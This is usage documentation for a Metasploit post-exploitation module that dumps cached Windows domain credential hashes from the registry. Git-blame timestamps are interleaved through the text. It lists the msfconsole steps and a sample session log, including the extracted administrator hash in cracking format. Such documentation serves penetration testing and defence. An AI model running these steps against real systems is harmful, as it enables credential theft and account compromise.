2019-12-11 13:59:53 -07:00
## Vulnerable Application
This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.
## Verification Steps
2019-12-13 11:34:00 -07:00
1. Start msfconsole
2019-12-11 13:59:53 -07:00
2. Get meterpreter session
2019-12-13 11:34:00 -07:00
3. Do: ```use post/windows/gather/cachedump` ``
4. Do: ```set SESSION <session id>` ``
2019-12-15 06:25:07 -05:00
5. Do: ```run` ``
2019-12-11 13:59:53 -07:00
## Options
2019-12-14 13:46:46 -07:00
**SESSION **
2019-12-11 13:59:53 -07:00
The session to run this module on.
## Scenarios
2019-12-14 13:46:46 -07:00
### Windows 7 (6.1 Build 7601, Service Pack 1).
2019-12-11 13:59:53 -07:00
```
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.6:49184) at 2019-12-11 12:51:59 -0700
msf > use post/windows/gather/cachedump
msf post(windows/gather/cachedump) > set SESSION 1
SESSION => 1
msf post(windows/gather/cachedump) > run
[*] Executing module against TEST-PC
[*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
[*] Obtaining boot key...
[*] Obtaining Lsa key...
[*] Vista or above system
[*] Obtaining NL$KM...
[*] Dumping cached credentials...
[*] Hash are in MSCACHE_VISTA format. (mscash2)
[+] MSCACHE v2 saved in: /root/.msf4/loot/20191211134214_default_192.168.1.6_mscache2.creds_626325.txt
[*] John the Ripper format:
# mscash2
administrator:$DCC2$10240#administrator#89f253291a4b53a41c94057d644cbd1d::
[*] Post module execution completed
` ``
